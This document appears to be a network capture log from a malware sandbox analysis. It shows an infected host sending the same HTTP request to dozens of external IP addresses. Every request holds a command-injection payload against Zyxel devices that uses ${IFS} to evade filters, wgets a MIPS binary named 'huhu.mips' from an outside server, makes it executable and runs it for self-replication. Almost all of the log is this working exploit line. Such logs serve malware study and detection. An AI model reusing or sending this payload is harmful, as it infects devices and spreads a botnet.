                                            Feb 2, 2024 06:21:27.937155008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8329192.168.2.1556000182.108.202.31443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937212944 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8330192.168.2.1556380145.191.66.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937246084 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8331192.168.2.154757618.188.92.63443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937309027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8332192.168.2.1533222148.168.109.176443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937360048 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8333192.168.2.1536232134.250.184.169443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937390089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8334192.168.2.1536892113.233.17.16443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937416077 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8335192.168.2.1537118141.219.107.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937457085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8336192.168.2.154704285.116.182.108443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937522888 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8337192.168.2.1560766156.255.131.23443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937544107 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8338192.168.2.1536860166.56.66.185443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937568903 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8339192.168.2.154132631.218.237.139443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937599897 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8340192.168.2.1554372158.80.97.15443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937655926 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8341192.168.2.1558696143.69.156.56443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937715054 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8342192.168.2.1553338117.164.122.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937720060 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8343192.168.2.1553954137.40.254.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937757015 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8344192.168.2.1543448164.187.99.189443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937820911 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8345192.168.2.1552030204.81.113.93443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937849998 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8346192.168.2.1540898109.98.213.225443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937906981 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8347192.168.2.153666079.70.11.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937927008 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8348192.168.2.155671476.116.136.62443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.937987089 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8349192.168.2.154956889.239.220.118443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938025951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8350192.168.2.1543826134.97.140.155443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938065052 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8351192.168.2.153328046.186.210.175443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938100100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8352192.168.2.1547350202.113.22.110443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938143969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8353192.168.2.1536642108.208.78.195443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938175917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8354192.168.2.1533048173.67.160.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938220978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8355192.168.2.155841851.193.83.208443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938266039 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8356192.168.2.1558724133.98.222.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938302040 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8357192.168.2.154009672.133.144.119443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938330889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8358192.168.2.155727632.124.26.32443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938389063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8359192.168.2.153774035.161.211.238443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938421011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8360192.168.2.15354329.135.127.61443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938452005 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8361192.168.2.154404076.58.206.90443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938486099 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8362192.168.2.1532776189.223.50.55443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938515902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8363192.168.2.1558878110.248.177.254443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938596964 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8364192.168.2.154232451.239.7.196443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938611984 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8365192.168.2.1536394201.34.86.30443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938633919 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8366192.168.2.153345265.229.173.12443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938679934 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8367192.168.2.1534756203.143.210.173443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938711882 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8368192.168.2.1541212212.173.95.207443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938741922 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8369192.168.2.155718063.121.3.143443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938785076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8370192.168.2.154005671.228.44.83443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938822985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8371192.168.2.153741484.85.244.120443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938863993 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8372192.168.2.1539864164.210.168.67443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938903093 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8373192.168.2.15405442.10.84.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938930035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8374192.168.2.1559650147.74.220.240443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.938986063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8375192.168.2.1558550164.26.88.50443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939018011 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8376192.168.2.153388453.139.17.241443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939043999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8377192.168.2.1541816128.200.153.20443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939099073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8378192.168.2.1555790160.115.185.49443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939138889 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8379192.168.2.154948667.73.150.27443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939173937 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8380192.168.2.1555588132.50.68.205443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939222097 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8381192.168.2.1548022218.60.205.197443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939256907 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8382192.168.2.1552772161.144.149.39443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939302921 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8383192.168.2.1533318178.92.225.34443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939338923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8384192.168.2.155262017.77.170.186443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939362049 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8385192.168.2.1557854188.108.8.40443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939444065 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8386192.168.2.154393476.180.55.163443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939480066 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8387192.168.2.153447427.247.132.237443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939508915 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8388192.168.2.1540302153.222.226.255443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939560890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8389192.168.2.154152685.35.5.71443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939591885 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8390192.168.2.155691892.114.210.206443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939630032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8391192.168.2.153569259.120.106.180443
                                            TimestampBytes transferredDirectionData
                                            Feb 2, 2024 06:21:27.939697027 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            8392192.168.2.153735873.254.199.123443
                                            TimestampBytes transferredDirectionData
